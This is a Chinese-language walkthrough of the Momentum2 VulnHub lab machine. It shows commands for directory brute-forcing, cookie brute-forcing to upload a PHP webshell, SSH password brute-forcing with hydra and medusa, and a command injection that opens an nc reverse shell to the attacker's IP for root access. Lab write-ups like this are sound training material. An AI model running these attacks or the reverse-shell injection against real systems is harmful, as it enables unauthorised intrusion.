文章详细描述了攻破Momentum2靶机的过程,包括使用arp-scan和nmap进行主机和端口扫描,通过dirbuster进行目录爆破,发现并利用js代码上传webshell,爆破cookie获取上传权限,最终通过ssh登录并使用python脚本实现提权。
靶机Momentum2
如果主机发现发现不了ip地址请看这里:https://hackergu.com/vulnhub-ip/
arp-scan主机发现nmap端口扫描
端口扫描
发现并没有可以利用的内容
我们使用dirb nikto 以及dirbuster进行目录爆破
dirb http://192.168.12.100/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -X .bak,.php,.html,.bak.php,.bak.bak,.php.bak -X 指定后缀名 -w 指定字典
我们去看一下
这里可以将这个php的备份文件下载
这里找到一个传文件的
这里发现一个js的
这里是我们发现的所有内容
这里我们分析这个js代码,意思是post请求传文件,并且将文件传递到ajax.php这里,然后通过ajax代码过滤之后,上传到指定路径,如果服务器响应为1则为上传成功
如果是其他的则为失败,所以我们要对ajax.php这我文件源码进行分析,而刚才我们将他下载了。
这个源码的意思是要在cookie的末尾加一个大写字母,并且是admin的cookie(&G6u@B6uDXMq&Ms),并且会增加一个新的post参数secure它的值为val1d,如果满足这些条件的话可以上传dpf php 以及txt,否则只能上传txt 所以我们这里需要去构建一个post的且有使用admin的cookie,然后传一个webshell
在这里我们也找到了上传路径,关于owls
所以我们构建好传一个webshell即可
这里我们构建完成,但是还需要cookie的最后一个大写字母,我们将其爆破出来
这里成功得到最后一个字母是R,所以这里我们成功的传入了我们的一句话
这里我们也找到
这里我们就可以使用蚁剑连接
这里成功连接
在这里找到第一个falg
发现一个这个 从password文件中发现的
myvulnerableapp[Asterisk] asterrisk是* 密码是myvulnerableapp*
这里我们并不知道后面是个什么 内容我们可以使用hydra爆破一下,我们生成与myvulnerableapp相关的字典
crunch 16 16 -t myvulnerableapp, >> password.txt
crunch 16 16 -t myvulnerableapp@ >> password.txt
crunch 16 16 -t myvulnerableapp% >> password.txt
crunch 16 16 -t myvulnerableapp^ >> password.txt
生成一个字典
使用hydra爆破,因为这个在athena这个家目录下面发现的,所以我们用户名使用这个尝试
hydra -l athena -P /root/password.txt -e ns 192.168.12.100 ssh
使用-l 指定用户 -P 指定字典
成功拿下
medusa -h 192.168.12.100 -u athena -P /root/password.txt -M ssh -f
使用medusa也能拿下
那我们就ssh登陆
ssh athena@192.168.12.100
athena@192.168.12.100's password:myvulnerableapp*
但是这里并非root,我们需要提权
这里我们可以看到我们可以使用一个python的文件来提权,我们去看一下
查看文件的内容,脚本的意思是,在运行脚本时会要求输入一个seed,这个seed会echo到log.txt文件中,在echo时会执行bash命令,所以这里直接反弹一个shell就可以提权了!
这里我们本地监听1111 直接反弹1111且弹一个/bin/bash即可
Enter the seed : ;nc -e /bin/bash 192.168.12.20 1111; 这里需要一个; 要不然不成功
成功弹上
拿下!
希望对各位有帮助,后续的靶机还在持续更新中!
扫一扫
914
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
